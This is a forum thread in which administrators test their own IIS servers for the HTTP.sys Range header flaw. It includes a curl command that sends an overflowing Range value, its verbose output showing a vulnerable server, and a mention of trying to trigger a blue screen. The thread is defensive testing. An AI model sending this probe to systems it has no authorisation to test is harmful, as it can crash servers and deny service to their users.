3 ms·
Have tried on all our production facing domains (with and without CDN and get 200 responses also. One server (our development server) has proven vulnerable. Ma
by amarraja 11y ago
Have tried on all our production facing domains (with and without CDN and get 200 responses also.
One server (our development server) has proven vulnerable. Maybe reverse proxies are sanitizing the results?
$ curl -v 10.100.0.40/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
* About to connect() to 10.100.0.40 port 80 (#0)
* Trying 10.100.0.40...
* Adding handle: conn: 0x1d83278
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x1d83278) send_pipe: 1, recv_pipe: 0
* Connected to 10.100.0.40 (10.100.0.40) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.30.0
> Accept: */*
> Host: irrelevant
> Range: bytes=0-18446744073709551615
>
< HTTP/1.1 416 Requested Range Not Satisfiable
< Content-Type: text/html
< Last-Modified: Wed, 27 Aug 2014 14:56:23 GMT
< Accept-Ranges: bytes
< ETag: "885fe5117c2cf1:0"
* Server Microsoft-IIS/7.5 is not blacklisted
< Server: Microsoft-IIS/7.5
- ftcHn 11y agoI've just tried on AWS Elastic Beanstalk https servers and not been able to BSOD. We don't have output caching enabled.